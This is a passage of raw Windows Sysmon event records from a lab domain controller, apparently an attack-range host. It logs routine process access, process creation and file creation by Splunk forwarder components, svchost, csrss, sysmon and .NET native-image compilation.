Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.891{59A5CD1D-9148-6005-4A02-00000000A301}33762828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.751{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9148-6005-4B02-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4B02-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9148-6005-4B02-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.737{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000006469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:48.672{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1380-0\System.Activities.DurableInstancing.dll2021-01-18 13:46:48.672 10341000x80000000000000006468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.251{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.251{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.251{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.219{59A5CD1D-9148-6005-4802-00000000A301}32444588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 